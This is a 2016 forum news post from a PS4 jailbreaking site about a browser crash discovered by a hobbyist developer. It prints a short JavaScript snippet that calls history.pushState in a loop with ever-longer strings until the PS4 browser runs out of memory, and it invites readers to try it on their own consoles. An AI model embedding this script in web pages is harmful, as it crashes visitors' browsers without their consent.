Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date Nov 20, 2016 at 2:30 AM       10      
Status
Not open for further replies.
A few weeks back we caught wind of a PSNS Protocol Crash which was further detailed HERE, and today following the HENkaku4.tk Webpage Demo PlayStation developer @SilicaAndPina shared the code alongside a demo video of crashing the PS4 browser with a 'There is not enough free system memory' out of memory PlayStation 4 error message. o_O

This reminds me of an article I read where Google's Pixel, Apple's Safari and Adobe's Flash all crumbled in seconds to a team of Chinese hackers at PwnFest recently. :LOL:

If you'd like to give it a whirl on your own PS4, you can do so at Silica's Test Site Henkaku4.tk using the Crash The Browser (PS4) (Throws an error) link, or using the code from her Pastebin.com below.
Code:
<script>
         var total = "";
         for( var i = 0; i < 100000; i++ ) {
             total = total + i.toString();
             history.pushState(0,0, total );
         }
</script>
Crashing the PS4 Browser -- MEMORY ERROR!!!
Below are some related Tweets on it, @LightningMods started a collection of PS4 HTML Scripts for those interested and thanks to @raedoob for sharing the news in the PSXHAX Shoutbox. (y)
PS4 Out of Memory Error Browser Crash Demo Video by SilicaAndPina.jpg

Comments

Status
Not open for further replies.
Back